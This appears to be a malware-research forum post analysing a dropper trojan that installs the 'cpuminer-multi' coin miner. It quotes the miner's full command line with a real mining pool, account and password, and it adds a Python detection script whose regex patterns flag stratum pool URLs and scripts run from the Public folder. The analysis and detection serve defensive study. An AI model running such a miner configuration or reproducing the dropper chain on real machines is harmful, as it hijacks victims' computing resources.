 #32408  by EP_X0FF
 Wed Jan 09, 2019 9:38 am
https://www.virustotal.com/en/file/ca2e ... 483276621/
Trojan muldrop with coin miner as payload.

SFX archive; next, the actual malware dropper extracts files to %UserProfile%\Public. The main malware is inside a password-protected zip file called dokinz.zip. This zip file is unpacked by ConsoleApplication1.exe (also dropped by the malware) with the password "dokinzakbar" (hardcoded inside ConsoleApplication1.exe). After unpacking, ConsoleApplication1.exe executes the malicious script NVidiaDriverUpdate.vbs.

TL;DR: it is a cryptocurrency miner configured as

    "NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u kso-magnitka@yandex.ru -p 2101skymagicss -t 1", 0, true

where NvidiaUpdater.exe is a coin miner called "cpuminer-multi".

This email can be found in Google and leads to Russian Magnitogorsk.
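An added detection example (not part of the post above) that turns the two observable steps of this chain into host-log checks: a script interpreter launched from the world-writable Public profile, and a process whose command line carries cpuminer-multi style miner options (-a/--algo plus a stratum pool URL). The event records, pool host and user are constructed placeholders; the "Image|CommandLine" record shape is an assumption standing in for a Sysmon or EDR process-creation log.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation records ("Image|CommandLine"), modelled on the
# chain described in the post; pool host, user and password are placeholders.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\wscript.exe|wscript.exe C:\Users\Public\NVidiaDriverUpdate.vbs",
    r"C:\Users\Public\NvidiaUpdater.exe|NvidiaUpdater.exe -a cryptonight "
    r"-o stratum+tcp://pool.example.invalid:45560 -u user@example.invalid -p x -t 1",
    r"C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe|nvcontainer.exe --service",
]

# cpuminer-multi style options: -a/--algo selects the algorithm, -o/--url the pool;
# a stratum+tcp/tls scheme in any command line is a strong miner indicator.
STRATUM_RE = re.compile(r"stratum\+(?:tcp|tls|ssl)://([^\s:/]+)(?::(\d+))?", re.I)
ALGO_RE = re.compile(r"(?:^|\s)(?:-a|--algo)[ =](\S+)", re.I)
# Script interpreters executing content dropped into the Public profile.
PUBLIC_SCRIPT_RE = re.compile(r"\\Users\\Public\\[^\s\"]+\.(?:vbs|js|wsf|ps1|bat)\b", re.I)


@dataclass
class Finding:
    image: str
    reason: str                     # "miner_cmdline" or "public_script"
    pool_host: Optional[str] = None
    pool_port: Optional[int] = None
    algo: Optional[str] = None


def inspect_event(record: str) -> Optional[Finding]:
    """Return a Finding for one 'Image|CommandLine' record, or None if nothing matched."""
    image, _, cmdline = record.partition("|")
    m = STRATUM_RE.search(cmdline)
    if m:
        a = ALGO_RE.search(cmdline)
        return Finding(image, "miner_cmdline", m.group(1),
                       int(m.group(2)) if m.group(2) else None,
                       a.group(1).lower() if a else None)
    if PUBLIC_SCRIPT_RE.search(cmdline):
        return Finding(image, "public_script")
    return None


def scan(records: List[str]) -> List[Finding]:
    """Run inspect_event over a batch of records and keep only the hits."""
    return [f for f in map(inspect_event, records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The pool host and port extracted from a hit are what an analyst would pivot on next (network logs, blocklists), so they are returned as fields rather than only printed.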

